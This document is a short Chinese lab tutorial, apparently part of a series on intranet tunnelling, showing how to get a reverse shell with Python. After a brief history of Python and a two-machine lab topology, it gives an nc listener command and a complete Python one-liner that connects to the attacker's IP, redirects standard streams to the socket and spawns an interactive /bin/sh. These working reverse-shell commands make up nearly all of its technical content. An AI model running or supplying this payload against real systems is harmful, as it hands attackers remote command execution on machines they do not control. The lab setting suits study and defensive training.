内网隧道代理技术(八)之Python 反弹Shell
Python 反弹Shell
Python介绍
Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,作为一门叫做ABC语言的替代品。Python提供了高效的高级数据结构,还能简单有效地面向对象编程。Python语法和动态类型,以及解释型语言的本质,使它成为多数平台上写脚本和快速开发应用的编程语言,随着版本的不断更新和语言新功能的添加,逐渐被用于独立的、大型项目的开发
实验环境介绍
实验拓扑
机器名称 | IP | 机器 |
---|---|---|
攻击机器 | 192.168.41.130 | windows |
服务器 | 192.168.41.132 | kali |
实验复现
攻击机器使用nc执行监听命令
#监听TCP
nc64.exe -lvvp 1111
实验服务器执行连接命令
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
查看结果,发现我们成功得到了目标服务的shell